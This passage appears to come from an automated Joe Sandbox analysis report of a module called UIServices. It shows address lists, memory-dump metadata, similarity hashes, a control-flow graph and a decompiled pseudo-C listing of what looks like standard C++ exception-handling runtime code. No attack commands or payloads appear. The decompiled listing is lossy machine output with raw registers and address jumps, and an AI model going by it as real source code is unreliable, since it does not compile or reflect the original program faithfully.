                                                    0x7ffc2356a495
                                                    0x7ffc2356a49a
                                                    0x7ffc2356a4a3
                                                    0x7ffc2356a4aa
                                                    0x7ffc2356a4ad
                                                    0x7ffc2356a4b7
                                                    0x7ffc2356a4bc
                                                    0x7ffc2356a4c1
                                                    0x7ffc2356a4c1
                                                    0x7ffc2356a4c8
                                                    0x7ffc2356a4d8
                                                    0x7ffc2356a4dc
                                                    0x7ffc2356a4e0
                                                    0x7ffc2356a4ec
                                                    0x7ffc2356a4f2
                                                    0x7ffc2356a4f5
                                                    0x7ffc2356a4fe
                                                    0x7ffc2356a505
                                                    0x7ffc2356a509
                                                    0x7ffc2356a50d
                                                    0x7ffc2356a511
                                                    0x7ffc2356a514
                                                    0x7ffc2356a518
                                                    0x7ffc2356a528
                                                    0x7ffc2356a535
                                                    0x7ffc2356a53c
                                                    0x7ffc2356a544
                                                    0x7ffc2356a54c
                                                    0x7ffc2356a551
                                                    0x7ffc2356a561
                                                    0x7ffc2356a56a
                                                    0x7ffc2356a571
                                                    0x7ffc2356a574
                                                    0x7ffc2356a57e
                                                    0x7ffc2356a584
                                                    0x7ffc2356a58b
                                                    0x7ffc2356a593
                                                    0x7ffc2356a59a
                                                    0x7ffc2356a5aa
                                                    0x7ffc2356a5bb
                                                    0x7ffc2356a5c6
                                                    0x7ffc2356a5ca
                                                    0x7ffc2356a5d0
                                                    0x7ffc2356a5d4
                                                    0x7ffc2356a5d8
                                                    0x7ffc2356a5e0
                                                    0x7ffc2356a5ec
                                                    0x7ffc2356a5f7
                                                    0x7ffc2356a5fa
                                                    0x7ffc2356a5fc
                                                    0x7ffc2356a5fc
                                                    0x7ffc2356a600
                                                    0x7ffc2356a60a
                                                    0x7ffc2356a613
                                                    0x7ffc2356a61c
                                                    0x7ffc2356a620
                                                    0x7ffc2356a627
                                                    0x7ffc2356a62a
                                                    0x7ffc2356a633
                                                    0x7ffc2356a637
                                                    0x7ffc2356a641
                                                    0x7ffc2356a64b
                                                    0x7ffc2356a653
                                                    0x7ffc2356a65b
                                                    0x7ffc2356a660
                                                    0x7ffc2356a664
                                                    0x7ffc2356a66b
                                                    0x7ffc2356a66e
                                                    0x7ffc2356a678
                                                    0x7ffc2356a67e
                                                    0x7ffc2356a68e
                                                    0x7ffc2356a694
                                                    0x7ffc2356a69b
                                                    0x7ffc2356a6a3
                                                    0x7ffc2356a6a7
                                                    0x7ffc2356a6aa
                                                    0x7ffc2356a6ba
                                                    0x7ffc2356a6cb
                                                    0x7ffc2356a6d6
                                                    0x7ffc2356a6da
                                                    0x7ffc2356a6e0
                                                    0x7ffc2356a6e8
                                                    0x7ffc2356a6f0
                                                    0x7ffc2356a6f9
                                                    0x7ffc2356a703
                                                    0x7ffc2356a708
                                                    0x7ffc2356a710
                                                    0x7ffc2356a718
                                                    0x7ffc2356a71d
                                                    0x7ffc2356a726
                                                    0x7ffc2356a72c
                                                    0x7ffc2356a735
                                                    0x7ffc2356a737
                                                    0x7ffc2356a73a
                                                    0x7ffc2356a74a
                                                    0x7ffc2356a74c
                                                    0x7ffc2356a75c
                                                    0x7ffc2356a767
                                                    0x7ffc2356a76b
                                                    0x7ffc2356a76e
                                                    0x7ffc2356a770
                                                    0x7ffc2356a779
                                                    0x7ffc2356a77f
                                                    0x7ffc2356a78a
                                                    0x7ffc2356a790
                                                    0x7ffc2356a794
                                                    0x7ffc2356a79c
                                                    0x7ffc2356a7a0
                                                    0x7ffc2356a7b1
                                                    0x7ffc2356a7b6
                                                    0x7ffc2356a7c1
                                                    0x7ffc2356a7cc
                                                    0x7ffc2356a7d0
                                                    0x7ffc2356a7df
                                                    0x7ffc2356a7ea
                                                    0x7ffc2356a7ec
                                                    0x7ffc2356a7ef
                                                    0x7ffc2356a7f3
                                                    0x7ffc2356a7f5
                                                    0x7ffc2356a7ff
                                                    0x7ffc2356a808
                                                    0x7ffc2356a80f
                                                    0x7ffc2356a817
                                                    0x7ffc2356a81b
                                                    0x7ffc2356a81e
                                                    0x7ffc2356a82e
                                                    0x7ffc2356a833
                                                    0x7ffc2356a83e
                                                    0x7ffc2356a84a
                                                    0x7ffc2356a84f
                                                    0x7ffc2356a85c
                                                    0x7ffc2356a861
                                                    0x7ffc2356a86b
                                                    0x7ffc2356a870
                                                    0x7ffc2356a882
                                                    0x7ffc2356a884
                                                    0x7ffc2356a890
                                                    0x7ffc2356a895
                                                    0x7ffc2356a897
                                                    0x7ffc2356a8a0
                                                    0x7ffc2356a8a6
                                                    0x7ffc2356a8b4
                                                    0x7ffc2356a8bb
                                                    0x7ffc2356a8c7
                                                    0x7ffc2356a8cc
                                                    0x7ffc2356a8dd
                                                    0x7ffc2356a8df
                                                    0x7ffc2356a8eb
                                                    0x7ffc2356a8f6
                                                    0x7ffc2356a8fc
                                                    0x7ffc2356a8ff
                                                    0x7ffc2356a902
                                                    0x7ffc2356a906
                                                    0x7ffc2356a90c
                                                    0x7ffc2356a90f
                                                    0x7ffc2356a911
                                                    0x7ffc2356a91a
                                                    0x7ffc2356a920
                                                    0x7ffc2356a92e
                                                    0x7ffc2356a930
                                                    0x7ffc2356a934
                                                    0x7ffc2356a938
                                                    0x7ffc2356a93a
                                                    0x7ffc2356a93e
                                                    0x7ffc2356a942
                                                    0x7ffc2356a968

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: ad86b220bfcdb31b6b2c81dea97df1f76549295fa32da24b22303f0250981423
                                                    • Instruction ID: 8c8b63f14032ff24ebe0a31e1700acfee5278d9eeab4d77900bdbd3af28a47d3
                                                    • Opcode Fuzzy Hash: ad86b220bfcdb31b6b2c81dea97df1f76549295fa32da24b22303f0250981423
                                                    • Instruction Fuzzy Hash: 30F19FB6F08AAA9EE710DF64D8901EC37B0EB4474CB404075EA4D67B99DF38D585CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1141 7ffc23562a44-7ffc23562ab3 call 7ffc23564db0 1144 7ffc23562edf-7ffc23562ee5 abort 1141->1144 1145 7ffc23562ab9-7ffc23562abc 1141->1145 1147 7ffc23562ee6-7ffc23562f05 call 7ffc2356f5b0 1144->1147 1145->1144 1146 7ffc23562ac2-7ffc23562ac8 1145->1146 1148 7ffc23562ace-7ffc23562ad2 1146->1148 1149 7ffc23562b99-7ffc23562bab 1146->1149 1148->1149 1153 7ffc23562ad8-7ffc23562ae3 1148->1153 1151 7ffc23562bb1-7ffc23562bb5 1149->1151 1152 7ffc23562e96-7ffc23562e9a 1149->1152 1151->1152 1157 7ffc23562bbb-7ffc23562bc6 1151->1157 1155 7ffc23562ed3-7ffc23562edd call 7ffc235664b0 1152->1155 1156 7ffc23562e9c-7ffc23562ea3 1152->1156 1153->1149 1158 7ffc23562ae9-7ffc23562aee 1153->1158 1155->1144 1155->1147 1156->1144 1159 7ffc23562ea5-7ffc23562ece call 7ffc23563430 1156->1159 1157->1152 1161 7ffc23562bcc-7ffc23562bd0 1157->1161 1158->1149 1162 7ffc23562af4-7ffc23562afe call 7ffc235664b0 1158->1162 1159->1155 1165 7ffc23562dac-7ffc23562db8 1161->1165 1166 7ffc23562bd6-7ffc23562c0d call 7ffc2356e928 1161->1166 1162->1147 1174 7ffc23562b04-7ffc23562b2f call 7ffc235664b0 * 2 call 7ffc2356f084 1162->1174 1165->1155 1168 7ffc23562dbe-7ffc23562dc2 1165->1168 1166->1165 1178 7ffc23562c13-7ffc23562c1b 1166->1178 1171 7ffc23562dd2-7ffc23562dda 1168->1171 1172 7ffc23562dc4-7ffc23562dd0 call 7ffc2356f044 1168->1172 1171->1155 1177 7ffc23562de0-7ffc23562ded call 7ffc2356e76c 1171->1177 1172->1171 1187 7ffc23562df3-7ffc23562dfb 1172->1187 1207 7ffc23562b31-7ffc23562b35 1174->1207 1208 7ffc23562b4f-7ffc23562b59 call 7ffc235664b0 1174->1208 1177->1155 1177->1187 1179 7ffc23562c20-7ffc23562c52 1178->1179 1184 7ffc23562d92-7ffc23562d99 1179->1184 1185 7ffc23562c58-7ffc23562c63 1179->1185 1184->1179 1192 7ffc23562d9f-7ffc23562da2 1184->1192 1185->1184 1188 7ffc23562c69-7ffc23562c82 1185->1188 1189 7ffc23562dfd-7ffc23562e1a call 7ffc235664b0 * 2 terminate 1187->1189 1190 7ffc23562e1b-7ffc23562e1f 1187->1190 1193 7ffc23562d8d 1188->1193 1194 7ffc23562c88-7ffc23562cd1 call 7ffc2356f058 * 2 1188->1194 1189->1190 1198 7ffc23562e21-7ffc23562e30 call 7ffc2356f044 1190->1198 1199 7ffc23562e32 1190->1199 1192->1155 1197 7ffc23562da8 1192->1197 1193->1184 1221 7ffc23562cd3-7ffc23562cf9 call 7ffc2356f058 call 7ffc23563938 1194->1221 1222 7ffc23562d0f-7ffc23562d15 1194->1222 1197->1165 1204 7ffc23562e34-7ffc23562e3e call 7ffc23564e48 1198->1204 1199->1204 1204->1155 1219 7ffc23562e44-7ffc23562e94 call 7ffc2356e838 call 7ffc2356ebc4 1204->1219 1207->1208 1213 7ffc23562b37-7ffc23562b42 1207->1213 1208->1149 1223 7ffc23562b5b-7ffc23562b7b call 7ffc235664b0 * 2 call 7ffc23564e48 1208->1223 1213->1208 1217 7ffc23562b44-7ffc23562b49 1213->1217 1217->1144 1217->1208 1219->1155 1238 7ffc23562d20-7ffc23562d86 call 7ffc2356289c 1221->1238 1239 7ffc23562cfb-7ffc23562d0d 1221->1239 1227 7ffc23562d88 1222->1227 1228 7ffc23562d17-7ffc23562d1b 1222->1228 1243 7ffc23562b7d-7ffc23562b87 call 7ffc23564f38 1223->1243 1244 7ffc23562b94 1223->1244 1227->1193 1228->1194 1238->1184 1239->1221 1239->1222 1247 7ffc23562b8d-7ffc23562b93 terminate 1243->1247 1248 7ffc23562f06-7ffc23562f2b call 7ffc23562070 call 7ffc23564200 call 7ffc23566190 1243->1248 1244->1149 1247->1244
                                                    C-Code - Quality: 56%
                                                    			E00007FFC7FFC23562A44(intOrPtr __ecx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				signed long long _t136;
                                                    				void* _t153;
                                                    				intOrPtr _t154;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t185;
                                                    				signed int _t186;
                                                    				signed int _t187;
                                                    				void* _t189;
                                                    				intOrPtr _t219;
                                                    				signed long long _t229;
                                                    				long long _t231;
                                                    				unsigned long long _t237;
                                                    				long long _t239;
                                                    				signed long long _t244;
                                                    				void* _t245;
                                                    				signed int _t247;
                                                    				intOrPtr* _t248;
                                                    				long long _t249;
                                                    				long long _t281;
                                                    				signed long long _t293;
                                                    				long long _t294;
                                                    				void* _t295;
                                                    				void* _t296;
                                                    				signed long long _t297;
                                                    				long long _t309;
                                                    				void* _t316;
                                                    				signed long long _t319;
                                                    
                                                    				_t295 = _t296 - 0x28;
                                                    				_t297 = _t296 - 0x128;
                                                    				_t229 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				 *(_t295 + 0x10) = _t229 ^ _t297;
                                                    				_t231 =  *((intOrPtr*)(_t295 + 0xa8));
                                                    				_t293 =  *((intOrPtr*)(_t295 + 0x90));
                                                    				 *((long long*)(_t297 + 0x68)) = __r8;
                                                    				_t248 = __rcx;
                                                    				 *((long long*)(_t295 - 0x80)) = __rdx;
                                                    				r13b = 0;
                                                    				 *((long long*)(_t295 - 0x78)) = _t231;
                                                    				 *((char*)(_t297 + 0x61)) = 0;
                                                    				 *((intOrPtr*)(_t297 + 0x60)) = r13b;
                                                    				_t294 = __r9;
                                                    				_t136 = E00007FFC7FFC23564DB0(__rcx, __rdx, __r9, __r9, _t295, _t293);
                                                    				r14d = _t136;
                                                    				if (_t136 - 0xffffffff < 0) goto 0x23562edf;
                                                    				if (_t136 -  *((intOrPtr*)(_t293 + 4)) >= 0) goto 0x23562edf;
                                                    				if ( *_t248 != 0xe06d7363) goto 0x23562b99;
                                                    				if ( *((intOrPtr*)(_t248 + 0x18)) != 4) goto 0x23562b99;
                                                    				if ( *((intOrPtr*)(_t248 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23562b99;
                                                    				if ( *((long long*)(_t248 + 0x30)) != 0) goto 0x23562b99;
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				if ( *((long long*)(_t231 + 0x20)) == 0) goto 0x23562ee6;
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				_t249 =  *((intOrPtr*)(_t231 + 0x20));
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				 *((char*)(_t297 + 0x61)) = 1;
                                                    				 *((long long*)(_t297 + 0x68)) =  *((intOrPtr*)(_t231 + 0x28));
                                                    				E00007FFC7FFC2356F084(_t231,  *((intOrPtr*)(_t249 + 0x38)));
                                                    				if ( *_t249 != 0xe06d7363) goto 0x23562b4f;
                                                    				if ( *((intOrPtr*)(_t249 + 0x18)) != 4) goto 0x23562b4f;
                                                    				if ( *((intOrPtr*)(_t249 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23562b4f;
                                                    				if ( *((long long*)(_t249 + 0x30)) == 0) goto 0x23562edf;
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				if ( *(_t231 + 0x38) == 0) goto 0x23562b99;
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				E00007FFC7FFC235664B0(_t231);
                                                    				 *(_t231 + 0x38) =  *(_t231 + 0x38) & 0x00000000;
                                                    				if (E00007FFC7FFC23564E48(_t231, _t249, _t249,  *(_t231 + 0x38), _t294) != 0) goto 0x23562b94;
                                                    				if (E00007FFC7FFC23564F38(_t231, _t249,  *(_t231 + 0x38), _t294, _t295) != 0) goto 0x23562f06;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				 *((long long*)(_t295 - 0x40)) =  *((intOrPtr*)(_t294 + 8));
                                                    				 *(_t295 - 0x48) = _t293;
                                                    				if ( *_t249 != 0xe06d7363) goto 0x23562e96;
                                                    				if ( *((intOrPtr*)(_t249 + 0x18)) != 4) goto 0x23562e96;
                                                    				if ( *((intOrPtr*)(_t249 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23562e96;
                                                    				if ( *((intOrPtr*)(_t293 + 0xc)) <= 0) goto 0x23562dac;
                                                    				 *(_t297 + 0x28) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				r8d = r14d;
                                                    				_t153 = E00007FFC7FFC2356E928(_t249, _t295 - 0x28, _t295 - 0x48, _t294, _t295, _t294, _t316);
                                                    				asm("movups xmm0, [ebp-0x28]");
                                                    				asm("movdqu [ebp-0x38], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t153 -  *((intOrPtr*)(_t295 - 0x10)) >= 0) goto 0x23562dac;
                                                    				_t309 =  *((intOrPtr*)(_t295 - 0x28));
                                                    				r12d =  *((intOrPtr*)(_t295 - 0x30));
                                                    				 *((long long*)(_t297 + 0x78)) = _t309;
                                                    				_t154 = r12d;
                                                    				asm("inc ecx");
                                                    				 *((intOrPtr*)(_t295 - 0x50)) = __ecx;
                                                    				asm("movd eax, xmm0");
                                                    				asm("movups [ebp-0x60], xmm0");
                                                    				if (_t154 - r14d > 0) goto 0x23562d92;
                                                    				_t237 =  *(_t295 - 0x60) >> 0x20;
                                                    				if (r14d - _t154 > 0) goto 0x23562d92;
                                                    				_t281 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t295 - 0x38)) + 0x10)) + ( *( *(_t295 - 0x38)) +  *( *(_t295 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t309 + 8)) + 0x10)) +  *((intOrPtr*)(_t294 + 8));
                                                    				r13d = 0;
                                                    				 *((long long*)(_t295 - 0x68)) = _t281;
                                                    				if (r15d == 0) goto 0x23562d8d;
                                                    				asm("movups xmm0, [edx+ecx*4]");
                                                    				asm("movups [ebp-0x8], xmm0");
                                                    				 *((intOrPtr*)(_t295 + 8)) =  *((intOrPtr*)(_t281 + 0x10 + (_t319 * 4 + _t319) * 4));
                                                    				E00007FFC7FFC2356F058(_t237);
                                                    				_t239 = _t237 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x30)) + 0xc));
                                                    				 *((long long*)(_t297 + 0x70)) = _t239;
                                                    				E00007FFC7FFC2356F058(_t239);
                                                    				_t185 =  *((intOrPtr*)(_t239 +  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x30)) + 0xc))));
                                                    				 *((intOrPtr*)(_t297 + 0x64)) = _t185;
                                                    				if (_t185 <= 0) goto 0x23562d0f;
                                                    				E00007FFC7FFC2356F058(_t239);
                                                    				 *((long long*)(_t295 - 0x70)) = _t239 +  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x70))));
                                                    				if (E00007FFC7FFC23563938(_t189, _t249, _t295 - 8, _t239 +  *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x70)))), _t293, _t294,  *((intOrPtr*)(_t249 + 0x30))) != 0) goto 0x23562d20;
                                                    				 *((long long*)(_t297 + 0x70)) =  *((long long*)(_t297 + 0x70)) + 4;
                                                    				_t161 =  *((intOrPtr*)(_t297 + 0x64)) - 1;
                                                    				 *((intOrPtr*)(_t297 + 0x64)) = _t161;
                                                    				if (_t161 > 0) goto 0x23562cd3;
                                                    				r13d = r13d + 1;
                                                    				if (r13d == r15d) goto 0x23562d88;
                                                    				goto 0x23562c88;
                                                    				r13b = 1;
                                                    				 *((char*)(_t297 + 0x58)) =  *((intOrPtr*)(_t295 + 0x98));
                                                    				 *(_t297 + 0x50) =  *((intOrPtr*)(_t297 + 0x61));
                                                    				 *((long long*)(_t297 + 0x48)) =  *((intOrPtr*)(_t295 - 0x78));
                                                    				 *(_t297 + 0x40) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x38) = _t295 - 0x60;
                                                    				 *(_t297 + 0x30) =  *((intOrPtr*)(_t295 - 0x70));
                                                    				_t244 = _t295 - 8;
                                                    				 *(_t297 + 0x28) = _t244;
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				 *((intOrPtr*)(_t297 + 0x60)) = r13b;
                                                    				E00007FFC7FFC2356289C(_t185, _t249, _t249,  *((intOrPtr*)(_t295 - 0x80)),  *((intOrPtr*)(_t297 + 0x68)), _t294);
                                                    				goto 0x23562d92;
                                                    				r13b =  *((intOrPtr*)(_t297 + 0x60));
                                                    				r12d = r12d + 1;
                                                    				if (r12d -  *((intOrPtr*)(_t295 - 0x10)) < 0) goto 0x23562c20;
                                                    				if (r13b != 0) goto 0x23562ed3;
                                                    				if (( *_t293 & 0x1fffffff) - 0x19930521 < 0) goto 0x23562ed3;
                                                    				_t219 =  *((intOrPtr*)(_t293 + 0x20));
                                                    				if (_t219 == 0) goto 0x23562dd2;
                                                    				E00007FFC7FFC2356F044(_t244);
                                                    				_t245 = _t244 +  *((intOrPtr*)(_t293 + 0x20));
                                                    				if (_t219 != 0) goto 0x23562df3;
                                                    				if (( *(_t293 + 0x24) >> 0x00000002 & 0x00000001) == 0) goto 0x23562ed3;
                                                    				if (E00007FFC7FFC2356E76C(_t185,  *(_t293 + 0x24) >> 0x00000002 & 0x00000001, _t245, _t294, _t293, _t294,  *((intOrPtr*)(_t297 + 0x78))) != 0) goto 0x23562ed3;
                                                    				if (( *(_t293 + 0x24) >> 0x00000002 & 0x00000001) == 0) goto 0x23562e1b;
                                                    				E00007FFC7FFC235664B0(_t245);
                                                    				 *((long long*)(_t245 + 0x20)) = _t249;
                                                    				E00007FFC7FFC235664B0(_t245);
                                                    				 *((long long*)(_t245 + 0x28)) =  *((intOrPtr*)(_t297 + 0x68));
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				if ( *((intOrPtr*)(_t293 + 0x20)) == 0) goto 0x23562e32;
                                                    				E00007FFC7FFC2356F044(_t245);
                                                    				goto 0x23562e34;
                                                    				if (E00007FFC7FFC23564E48( *((intOrPtr*)(_t293 + 0x20)), _t249, _t249, _t245 +  *((intOrPtr*)(_t293 + 0x20)), _t294) != 0) goto 0x23562ed3;
                                                    				E00007FFC7FFC2356E838(_t185, _t249,  *((intOrPtr*)(_t295 - 0x80)), _t294, _t295, _t293, _t295 - 0x70);
                                                    				_t186 =  *((intOrPtr*)(_t295 + 0x98));
                                                    				 *(_t297 + 0x50) = _t186;
                                                    				_t187 = _t186 | 0xffffffff;
                                                    				 *((long long*)(_t297 + 0x48)) = _t294;
                                                    				 *(_t297 + 0x40) =  *(_t297 + 0x40) & 0x00000000;
                                                    				 *(_t297 + 0x38) = _t187;
                                                    				 *(_t297 + 0x30) = _t187;
                                                    				 *(_t297 + 0x28) = _t293;
                                                    				 *(_t297 + 0x20) =  *(_t297 + 0x20) & 0x00000000;
                                                    				E00007FFC7FFC2356EBC4( *((intOrPtr*)(_t295 - 0x80)), _t249,  *((intOrPtr*)(_t297 + 0x68)),  *((intOrPtr*)(_t293 + 0x20)));
                                                    				goto 0x23562ed3;
                                                    				if ( *((intOrPtr*)(_t293 + 0xc)) <= 0) goto 0x23562ed3;
                                                    				if ( *((intOrPtr*)(_t295 + 0x98)) != r13b) goto 0x23562edf;
                                                    				_t247 =  *((intOrPtr*)(_t295 - 0x78));
                                                    				 *(_t297 + 0x38) = _t247;
                                                    				 *(_t297 + 0x30) =  *(_t295 + 0xa0);
                                                    				 *(_t297 + 0x28) = r14d;
                                                    				 *(_t297 + 0x20) = _t293;
                                                    				E00007FFC7FFC23563430(_t249, _t249,  *((intOrPtr*)(_t295 - 0x80)),  *(_t295 - 0x58) >> 0x20, _t294);
                                                    				E00007FFC7FFC235664B0(_t247);
                                                    				if ( *((long long*)(_t247 + 0x38)) == 0) goto 0x23562ee6;
                                                    				abort();
                                                    				asm("int3");
                                                    				return E00007FFC7FFC2356F5B0(_t187, _t247,  *(_t295 + 0x10) ^ _t297,  *((intOrPtr*)(_t295 - 0x80)));
                                                    			}


































                                                    0x7ffc23562a51
                                                    0x7ffc23562a56
                                                    0x7ffc23562a5d
                                                    0x7ffc23562a67
                                                    0x7ffc23562a6b
                                                    0x7ffc23562a75
                                                    0x7ffc23562a7f
                                                    0x7ffc23562a84
                                                    0x7ffc23562a87
                                                    0x7ffc23562a8b
                                                    0x7ffc23562a91
                                                    0x7ffc23562a98
                                                    0x7ffc23562aa0
                                                    0x7ffc23562aa5
                                                    0x7ffc23562aa8
                                                    0x7ffc23562aad
                                                    0x7ffc23562ab3
                                                    0x7ffc23562abc
                                                    0x7ffc23562ac8
                                                    0x7ffc23562ad2
                                                    0x7ffc23562ae3
                                                    0x7ffc23562aee
                                                    0x7ffc23562af4
                                                    0x7ffc23562afe
                                                    0x7ffc23562b04
                                                    0x7ffc23562b09
                                                    0x7ffc23562b0d
                                                    0x7ffc23562b16
                                                    0x7ffc23562b1f
                                                    0x7ffc23562b24
                                                    0x7ffc23562b2f
                                                    0x7ffc23562b35
                                                    0x7ffc23562b42
                                                    0x7ffc23562b49
                                                    0x7ffc23562b4f
                                                    0x7ffc23562b59
                                                    0x7ffc23562b5b
                                                    0x7ffc23562b64
                                                    0x7ffc23562b6f
                                                    0x7ffc23562b7b
                                                    0x7ffc23562b87
                                                    0x7ffc23562b8d
                                                    0x7ffc23562b93
                                                    0x7ffc23562b9d
                                                    0x7ffc23562ba1
                                                    0x7ffc23562bab
                                                    0x7ffc23562bb5
                                                    0x7ffc23562bc6
                                                    0x7ffc23562bd0
                                                    0x7ffc23562be0
                                                    0x7ffc23562beb
                                                    0x7ffc23562bf0
                                                    0x7ffc23562bf3
                                                    0x7ffc23562bf8
                                                    0x7ffc23562bfc
                                                    0x7ffc23562c01
                                                    0x7ffc23562c06
                                                    0x7ffc23562c0d
                                                    0x7ffc23562c13
                                                    0x7ffc23562c17
                                                    0x7ffc23562c1b
                                                    0x7ffc23562c2b
                                                    0x7ffc23562c3a
                                                    0x7ffc23562c44
                                                    0x7ffc23562c47
                                                    0x7ffc23562c4b
                                                    0x7ffc23562c52
                                                    0x7ffc23562c5c
                                                    0x7ffc23562c63
                                                    0x7ffc23562c70
                                                    0x7ffc23562c74
                                                    0x7ffc23562c7b
                                                    0x7ffc23562c82
                                                    0x7ffc23562c93
                                                    0x7ffc23562c97
                                                    0x7ffc23562c9f
                                                    0x7ffc23562ca2
                                                    0x7ffc23562cb3
                                                    0x7ffc23562cb6
                                                    0x7ffc23562cbb
                                                    0x7ffc23562cc8
                                                    0x7ffc23562ccb
                                                    0x7ffc23562cd1
                                                    0x7ffc23562cd3
                                                    0x7ffc23562cee
                                                    0x7ffc23562cf9
                                                    0x7ffc23562cff
                                                    0x7ffc23562d05
                                                    0x7ffc23562d07
                                                    0x7ffc23562d0d
                                                    0x7ffc23562d0f
                                                    0x7ffc23562d15
                                                    0x7ffc23562d1b
                                                    0x7ffc23562d26
                                                    0x7ffc23562d38
                                                    0x7ffc23562d40
                                                    0x7ffc23562d48
                                                    0x7ffc23562d53
                                                    0x7ffc23562d5b
                                                    0x7ffc23562d64
                                                    0x7ffc23562d69
                                                    0x7ffc23562d6d
                                                    0x7ffc23562d72
                                                    0x7ffc23562d77
                                                    0x7ffc23562d7c
                                                    0x7ffc23562d86
                                                    0x7ffc23562d8d
                                                    0x7ffc23562d92
                                                    0x7ffc23562d99
                                                    0x7ffc23562da2
                                                    0x7ffc23562db8
                                                    0x7ffc23562dbe
                                                    0x7ffc23562dc2
                                                    0x7ffc23562dc4
                                                    0x7ffc23562dcd
                                                    0x7ffc23562dd0
                                                    0x7ffc23562dda
                                                    0x7ffc23562ded
                                                    0x7ffc23562dfb
                                                    0x7ffc23562dfd
                                                    0x7ffc23562e02
                                                    0x7ffc23562e06
                                                    0x7ffc23562e10
                                                    0x7ffc23562e14
                                                    0x7ffc23562e1a
                                                    0x7ffc23562e1f
                                                    0x7ffc23562e21
                                                    0x7ffc23562e30
                                                    0x7ffc23562e3e
                                                    0x7ffc23562e51
                                                    0x7ffc23562e56
                                                    0x7ffc23562e67
                                                    0x7ffc23562e6b
                                                    0x7ffc23562e6e
                                                    0x7ffc23562e73
                                                    0x7ffc23562e79
                                                    0x7ffc23562e7d
                                                    0x7ffc23562e84
                                                    0x7ffc23562e89
                                                    0x7ffc23562e8f
                                                    0x7ffc23562e94
                                                    0x7ffc23562e9a
                                                    0x7ffc23562ea3
                                                    0x7ffc23562ea5
                                                    0x7ffc23562eac
                                                    0x7ffc23562ebd
                                                    0x7ffc23562ec4
                                                    0x7ffc23562ec9
                                                    0x7ffc23562ece
                                                    0x7ffc23562ed3
                                                    0x7ffc23562edd
                                                    0x7ffc23562edf
                                                    0x7ffc23562ee5
                                                    0x7ffc23562f05

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3436797354-393685449
                                                    • Opcode ID: 4ce3170e83371cd51e0fa65dcacfbb5ce84ccfa47a74054cac5f199e7ec26cb9
                                                    • Instruction ID: 56669a32b029cee677baf11cadc5466f7883bec8c0c25d8af2b313f9d1985660
                                                    • Opcode Fuzzy Hash: 4ce3170e83371cd51e0fa65dcacfbb5ce84ccfa47a74054cac5f199e7ec26cb9
                                                    • Instruction Fuzzy Hash: AAE17C32E18B598AEB60DF65D8403AD77A0FB49B98F000175DE8D67B99CF38E491CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
